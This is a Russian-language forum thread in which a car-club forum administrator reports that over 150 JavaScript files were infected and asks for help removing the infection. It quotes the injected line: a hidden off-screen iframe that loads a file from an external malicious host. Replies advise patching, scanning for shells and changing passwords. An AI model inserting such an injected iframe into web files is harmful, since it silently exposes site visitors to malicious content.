Мой форум: nissanmaximaclub.ru

 

Заметил на форуме фреймы, содержащие посторонние сайты. Полез копать, и что я вижу!

В большинстве файлов .js в самом конце последняя строка:

 

;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://emxfji.pcanywhere.net/b9c21ce4cc46f581781cf2756477b167.sys?11"></iframe>');

 

Заражено более 150 файлов, причем во фрейме всречаются разные адреса.

 

Подскажите как убить заразу! Удаляю строку, она снова появляется(

http://ipbskins.ru/forum/topic10798.html

 

1. Пропатчить форум

2. Почистить от вирусов и шеллов

3. Сменить пароли (админ акк на форуме, бд, можно фтп). Этот пункт следует проделать после тщательной проверки п.2

Все вроде бы понятно, но второй пункт как выполнить?

Все вроде бы понятно, но второй пункт как выполнить?

Можно так google.com/webmasters/tools/

яндекс вебмастер не находит заражений, моюсь в гугле также будет

А вы не бойтесь, там ничего страшного нету, просто попробуйте - всё покажет.

Все вроде бы понятно, но второй пункт как выполнить?

Можно так google.ru - поиск шеллов и вирусов на сайте

Есть еще такой скрипт revisium.com/ai/, но он в любом случае требует навыков программирования

Или обратится к специалистам

Можно поинтересоваться, удалось ли решить проблему? И если да - то как?

вычистил все файлы от вирусного кода, и еще удалил скрипты редактора TinyMCE, кажись его скрипты заражали остальные файлы

в общем IE 9.0 выдает какие-то ошибки. видимо что-то еще накрылось. помогите платно решить проблемы!

Наверняка вам дешевле будет один раз заплатить техподдержке 70 долларов за полгода и решить все ваши проблемы, чем обращаться к малознакомым людям, далеким от профессионализма в программировании IPB, которые могут добавить кучу своих дыр, преднамеренно или непреднамеренно - из-за незнания.

Изменено 26 декабря 201212 г пользователем Zero108